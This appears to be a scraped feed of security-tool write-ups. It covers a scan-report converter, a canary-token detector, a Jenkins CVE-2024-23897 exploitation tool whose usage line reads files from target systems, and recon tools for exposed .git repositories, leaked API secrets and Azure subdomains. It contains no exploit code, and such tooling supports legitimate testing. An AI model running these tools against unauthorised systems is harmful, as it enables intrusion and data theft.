    1. argparse (dev-python/argparse);
    2. prettytable (dev-python/prettytable);
    3. python (dev-lang/python);
    4. xlsxwriter (dev-python/xlsxwriter).

    Install

    Using Pip:

    pip install --user sr2t

    Usage

    You can use sr2t in two ways:

    • When installed as package, call the installed script: sr2t --help.
    • When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
    $ sr2t --help
    usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
    [--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
    [--testssl TESTSSL [TESTSSL ...]]
    [--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
    [--nmap-services] [--no-nessus-autoclassify]
    [--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
    [--nessus-tls-file NESSUS_TLS_FILE]
    [--nessus-x509-file NESSUS_X509_FILE]
    [--nessus-http-file NESSUS_HTTP_FILE]
    [--nessus-smb-file NESSUS_SMB_FILE]
    [--nessus-rdp-file NESSUS_RDP_FILE]
    [--nessus-ssh-file NESSUS_SSH_FILE]
    [--nessus-min-severity NESSUS_MIN_SEVERITY]
    [--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
    [--nessus-sort-by NESSUS_SORT_BY]
    [--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]
    [-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
    [-oA OUTPUT_ALL]

    Converting scanning reports to a tabular format

    optional arguments:
    -h, --help show this help message and exit
    --nmap-state NMAP_STATE
    Specify the desired state to filter (e.g.
    open|filtered).
    --nmap-services Specify to ouput a supplemental list of detected
    services.
    --no-nessus-autoclassify
    Specify to not autoclassify Nessus results.
    --nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
    Specify to override a custom Nessus autoclassify YAML
    file.
    --nessus-tls-file NESSUS_TLS_FILE
    Specify to override a custom Nessus TLS findings YAML
    file.
    --nessus-x509-file NESSUS_X509_FILE
    Specify to override a custom Nessus X.509 findings
    YAML file.
    --nessus-http-file NESSUS_HTTP_FILE
    Specify to override a custom Nessus HTTP findings YAML
    file.
    --nessus-smb-file NESSUS_SMB_FILE
    Specify to override a custom Nessus SMB findings YAML
    file.
    --nessus-rdp-file NESSUS_RDP_FILE
    Specify to override a custom Nessus RDP findings YAML
    file.
    --nessus-ssh-file NESSUS_SSH_FILE
    Specify to override a custom Nessus SSH findings YAML
    file.
    --nessus-min-severity NESSUS_MIN_SEVERITY
    Specify the minimum severity to output (e.g. 1).
    --nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
    Specify the width of the pluginid column (e.g. 30).
    --nessus-sort-by NESSUS_SORT_BY
    Specify to sort output by ip-address, port, plugin-id,
    plugin-name or severity.
    --nikto-description-width NIKTO_DESCRIPTION_WIDTH
    Specify the width of the description column (e.g. 30).
    --fortify-details Specify to include the Fortify abstracts, explanations
    and recommendations for each vulnerability.
    --annotation-width ANNOTATION_WIDTH
    Specify the width of the annotation column (e.g. 30).
    -oC OUTPUT_CSV, --output-csv OUTPUT_CSV
    Specify the output CSV basename (e.g. output).
    -oT OUTPUT_TXT, --output-txt OUTPUT_TXT
    Specify the output TXT file (e.g. output.txt).
    -oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
    Specify the outpu t XLSX file (e.g. output.xlsx). Only
    for Nessus at the moment
    -oA OUTPUT_ALL, --output-all OUTPUT_ALL
    Specify the output basename to output to all formats
    (e.g. output).

    specify at least one:
    --nessus NESSUS [NESSUS ...]
    Specify (multiple) Nessus XML files.
    --nmap NMAP [NMAP ...]
    Specify (multiple) Nmap XML files.
    --nikto NIKTO [NIKTO ...]
    Specify (multiple) Nikto XML files.
    --dirble DIRBLE [DIRBLE ...]
    Specify (multiple) Dirble XML files.
    --testssl TESTSSL [TESTSSL ...]
    Specify (multiple) Testssl JSON files.
    --fortify FORTIFY [FORTIFY ...]
    Specify (multiple) HP Fortify FPR files.

    Example

    A few examples

    Nessus

    To produce an XLSX format:

    $ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

    To produce an text tabular format to stdout:

    $ sr2t --nessus example/nessus.nessus
    +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
    | host | port | plugin id | plugin name | severity | annotations |
    +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
    | 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
    | 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
    | 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
    | 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
    | 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
    | 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
    | 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
    | 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
    | 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
    | 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
    | 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
    | 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
    | 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
    | 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
    | 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
    | 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
    | 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
    | 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
    | 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
    | 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
    | 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
    | 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
    | 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
    +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+

    Or to output a CSV file:

    $ sr2t --nessus example/nessus.nessus -oC example
    $ cat example_nessus.csv
    host,port,plugin id,plugin name,severity,annotations
    192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
    192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
    192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
    192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
    192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
    192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
    192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
    192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
    192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
    192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
    192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
    192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
    192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
    192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
    192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
    192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
    192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
    192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
    192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
    192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
    192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
    192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
    192.168.142.2,44 5,57608,SMB Signing not required,2,X

    Nmap

    To produce an XLSX format:

    $ sr2t --nmap example/nmap.xml -oX example.xlsx

    To produce an text tabular format to stdout:

    $ sr2t --nmap example/nmap.xml --nmap-services
    Nmap TCP:
    +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
    | | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
    +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
    | 192.168.23.78 | X | | X | X | X | X | X | X | | |
    | 192.168.27.243 | | | | X | X | | X | X | X | X |
    | 192.168.99.164 | | | | X | X | | X | X | X | X |
    | 192.168.228.211 | | X | | | | | | | | |
    | 192.168.171.74 | | | | X | X | | X | X | X | X |
    +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+

    Nmap Services:
    +-----------------+------+-------+---------------+-------+
    | ip address | port | proto | service | state |
    +--------------- --+------+-------+---------------+-------+
    | 192.168.23.78 | 53 | tcp | domain | open |
    | 192.168.23.78 | 88 | tcp | kerberos-sec | open |
    | 192.168.23.78 | 135 | tcp | msrpc | open |
    | 192.168.23.78 | 139 | tcp | netbios-ssn | open |
    | 192.168.23.78 | 389 | tcp | ldap | open |
    | 192.168.23.78 | 445 | tcp | microsoft-ds | open |
    | 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
    | 192.168.27.243 | 135 | tcp | msrpc | open |
    | 192.168.27.243 | 139 | tcp | netbios-ssn | open |
    | 192.168.27.243 | 445 | tcp | microsoft-ds | open |
    | 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
    | 192.168.27.243 | 5800 | tcp | vnc-http | open |
    | 192.168.27.243 | 5900 | tcp | vnc | open |
    | 192.168.99.164 | 135 | tcp | msrpc | open |
    | 192.168.99.164 | 139 | tcp | netbios-ssn | open |
    | 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
    | 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
    | 192.168.99.164 | 5800 | tcp | vnc-http | open |
    | 192.168.99.164 | 5900 | tcp | vnc | open |
    | 192.168.228.211 | 80 | tcp | http | open |
    | 192.168.171.74 | 135 | tcp | msrpc | open |
    | 192.168.171.74 | 139 | tcp | netbios-ssn | open |
    | 192.168.171.74 | 445 | tcp | microsoft-ds | open |
    | 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
    | 192.168.171.74 | 5800 | tcp | vnc-http | open |
    | 192.168.171.74 | 5900 | tcp | vnc | open |
    +-----------------+------+-------+---------------+-------+

    Or to output a CSV file:

    $ sr2t --nmap example/nmap.xml -oC example
    $ cat example_nmap_tcp.csv
    ip address,53,80,88,135,139,389,445,3389,5800,5900
    192.168.23.78,X,,X,X,X,X,X,X,,
    192.168.27.243,,,,X,X,,X,X,X,X
    192.168.99.164,,,,X,X,,X,X,X,X
    192.168.228.211,,X,,,,,,,,
    192.168.171.74,,,,X,X,,X,X,X,X

    Nikto

    To produce an XLSX format:

    $ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

    To produce an text tabular format to stdout:

    $ sr2t --nikto example/nikto.xml
    +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
    | target ip | target hostname | target port | description | annotations |
    +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
    | 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
    | 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
    | | | | agent to protect against some forms of XSS | |
    | 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
    | | | | render the content of the site in a different fashion to the MIME type | |
    +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+

    Or to output a CSV file:

    $ sr2t --nikto example/nikto.xml -oC example
    $ cat example_nikto.csv
    target ip,target hostname,target port,description,annotations
    192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
    192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
    agent to protect against some forms of XSS",X
    192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
    render the content of the site in a different fashion to the MIME type",X

    Dirble

    To produce an XLSX format:

    $ sr2t --dirble example/dirble.xml -oX example.xlsx

    To produce an text tabular format to stdout:

    $ sr2t --dirble example/dirble.xml
    +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
    | url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
    +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
    | http://example.org/flv | 0 | 0 | false | false | false | | X |
    | http://example.org/hire | 0 | 0 | false | false | false | | X |
    | http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
    | http://example.org/print_order | 0 | 0 | false | false | fa lse | | X |
    | http://example.org/putty | 0 | 0 | false | false | false | | X |
    | http://example.org/receipts | 0 | 0 | false | false | false | | X |
    +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+

    Or to output a CSV file:

    $ sr2t --dirble example/dirble.xml -oC example
    $ cat example_dirble.csv
    url,code,content len,is directory,is listable,found from listable,redirect url,annotations
    http://example.org/flv,0,0,false,false,false,,X
    http://example.org/hire,0,0,false,false,false,,X
    http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
    http://example.org/print_order,0,0,false,false,false,,X
    http://example.org/putty,0,0,false,false,false,,X
    http://example.org/receipts,0,0,false,false,false,,X

    Testssl

    To produce an XLSX format:

    $ sr2t --testssl example/testssl.json -oX example.xlsx

    To produce an text tabular format to stdout:

    $ sr2t --testssl example/testssl.json
    +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
    | ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
    +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
    | rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
    +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+

    Or to output a CSV file:

    $ sr2t --testssl example/testssl.json -oC example
    $ cat example_testssl.csv
    ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
    rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X

    Fortify

    To produce an XLSX format:

    $ sr2t --fortify example/fortify.fpr -oX example.xlsx

    To produce an text tabular format to stdout:

    $ sr2t --fortify example/fortify.fpr
    +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
    | | type | subtype | severity | confidence | annotations |
    +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
    | example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
    | example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
    | example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
    | example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
    | example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
    | example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
    | example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
    +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+

    Or to output a CSV file:

    $ sr2t --fortify example/fortify.fpr -oC example
    $ cat example_fortify.csv
    ,type,subtype,severity,confidence,annotations
    example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
    example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
    example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
    example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
    example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
    example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
    example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X

    Donate

    • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp


    CanaryTokenScanner - Script Designed To Proactively Identify Canary Tokens Within Microsoft Office Documents And Acrobat Reader PDF (docx, xlsx, pptx, pdf)

    By: Zion3R


    Detecting Canary Tokens and Suspicious URLs in Microsoft Office, Acrobat Reader PDF and Zip Files

    Introduction

    In the dynamic realm of cybersecurity, vigilance and proactive defense are key. Malicious actors often leverage Microsoft Office files and Zip archives, embedding covert URLs or macros to initiate harmful actions. This Python script is crafted to detect potential threats by scrutinizing the contents of Microsoft Office documents, Acrobat Reader PDF documents and Zip files, reducing the risk of inadvertently triggering malicious code.


    Understanding the Script

    Identification

    The script smartly identifies Microsoft Office documents (.docx, .xlsx, .pptx), Acrobat Reader PDF documents (.pdf) and Zip files. These file types, including Office documents, are zip archives that can be examined programmatically.


    Decompression and Scanning

    For both Office and Zip files, the script decompresses the contents into a temporary directory. It then scans these contents for URLs using regular expressions, searching for potential signs of compromise.


    Ignoring Certain URLs

    To minimize false positives, the script includes a list of domains to ignore, filtering out common URLs typically found in Office documents. This ensures focused analysis on unusual or potentially harmful URLs.


    Flagging Suspicious Files

    Files with URLs not on the ignored list are marked as suspicious. This heuristic method allows for adaptability based on your specific security context and threat landscape.


    Cleanup and Restoration

    Post-scanning, the script cleans up by erasing temporary decompressed files, leaving no traces.


    Usage

    To effectively utilize the script:

    1. Setup
    2. Ensure Python is installed on your system.
    3. Position the script in an accessible location.
    4. Execute the script with the command: python CanaryTokenScanner.py FILE_OR_DIRECTORY_PATH (Replace FILE_OR_DIRECTORY_PATH with the actual file or directory path.)

    5. Interpretation

    6. Examine the output. Remember, this script is a starting point; flagged documents might not be harmful, and not all malicious documents will be flagged. Manual examination and additional security measures are advisable.

    Script Showcase

    ย 

    An example of the Canary Token Scanner script in action, demonstrating its capability to detect suspicious URLs.


    Disclaimer

    This script is intended for educational and security testing purposes only. Utilize it responsibly and in compliance with applicable laws and regulations.



    CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner

    By: Zion3R


    Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.


    Usage

    Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.

    python CVE-2024-23897.py -t <target> -p <port> -f <file>

    or

    python CVE-2024-23897.py -i <input_file> -f <file>

    Parameters: - -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block. - -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line). - -o or --output-file: Export results to file (optional). - -p or --port: Specify the port number. Default is 8080 (optional). - -f or --file: Specify the file to read on the target system.


    Changelog

    [27th January 2024] - Feature Request
    • Added scanning/exploiting via input file with hosts (-i INPUT_FILE).
    • Added export to file (-o OUTPUT_FILE).

    [26th January 2024] - Initial Release
    • Initial release.

    Contributing

    Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


    Author

    Alexander Hagenah - URL - Twitter


    Disclaimer

    This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.



    RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

    By: Zion3R


    RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.


    Features
    • Automated scanning of domains and subdomains for exposed .git repositories.
    • Streamlines the detection of sensitive data exposures.
    • User-friendly command-line interface.
    • Ideal for security audits and Bug Bounty.

    Installation

    Clone the repository and install the required dependencies:

    git clone https://github.com/YourUsername/RepoReaper.git
    cd RepoReaper
    pip install -r requirements.txt
    chmod +x RepoReaper.py

    Usage

    RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

    To start RepoReaper, simply run:

    ./RepoReaper.py
    or
    python3 RepoReaper.py

    Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains: Enter the path of the file containing domains

    Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

    example.com
    subdomain.example.com
    anotherdomain.com

    RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.ย 


    Disclaimer

    This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



    SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits

    By: Zion3R


    SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.


    Features
    • CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database.
    • EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.
    • PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.
    • CISA KEV: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.
    • Patching Priority System: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.
    • Multi-CVE Support and Export Options: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.
    • User-Friendly Interface: Easy to use, providing clear and concise information.
    • Comprehensive Security Tool: Ideal for quick security assessments and staying informed about recent vulnerabilities.

    Usage

    Regular:

    python sploitscan.py CVE-YYYY-NNNNN

    Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.

    python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN

    Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.

    python sploitscan.py CVE-YYYY-NNNNN -e JSON

    Patching Prioritization System

    The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:

    • A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.
    • A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:
    • A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.
    • B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.
    • C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.
    • D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.

    This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.


    Changelog

    [17th February 2024] - Enhancement Update
    • Additional Information: Added further information such as references & vector string
    • Removed: Star count in publicly available exploits

    [15th January 2024] - Enhancement Update
    • Multiple CVE Support: Now capable of handling multiple CVE IDs in a single execution.
    • JSON and CSV Export: Added functionality to export results to JSON and CSV files.
    • Enhanced CVE Display: Improved visual differentiation and information layout for each CVE.
    • Patching Priority System: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.

    [13th January 2024] - Initial Release
    • Initial release of SploitScan.

    Contributing

    Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


    Author

    Alexander Hagenah - URL - Twitter


    Credits


    SwaggerSpy - Automated OSINT On SwaggerHub

    By: Zion3R


    SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.


    What is Swagger?

    Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.


    About SwaggerHub

    SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.


    Why OSINT on SwaggerHub?

    Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

    1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

    2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

    3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

    4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

    5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

    6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

    By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.


    How SwaggerSpy Works

    SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.


    Getting Started

    To use SwaggerSpy, follow these steps:

    1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
    git clone https://github.com/UndeadSec/SwaggerSpy.git
    cd SwaggerSpy
    pip install -r requirements.txt
    1. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
    python swaggerspy.py searchterm
    1. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.

    Disclaimer

    SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


    Contribution

    Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.


    About the Author

    SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

    I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


    TODO

    Regular Expressions Enhancement
    • [ ] Review and improve existing regular expressions.
    • [ ] Ensure that regular expressions adhere to best practices.
    • [ ] Check for any potential optimizations in the regex patterns.
    • [ ] Test regular expressions with various input scenarios for accuracy.
    • [ ] Document any complex or non-trivial regex patterns for better understanding.
    • [ ] Explore opportunities to modularize or break down complex patterns.
    • [ ] Verify the regular expressions against the latest specifications or requirements.
    • [ ] Update documentation to reflect any changes made to the regular expressions.

    License

    SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


    Thanks

    Special thanks to @Liodeus for providing project inspiration through swaggerHole.



    AzSubEnum - Azure Service Subdomain Enumeration

    By: Zion3R


    AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


    How it works?

    AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

    With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.


    Why i create this?

    During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.


    Usage
    โžœ  AzSubEnum git:(main) โœ— python3 azsubenum.py --help
    usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

    Azure Subdomain Enumeration

    options:
    -h, --help show this help message and exit
    -b BASE, --base BASE Base name to use
    -v, --verbose Show verbose output
    -t THREADS, --threads THREADS
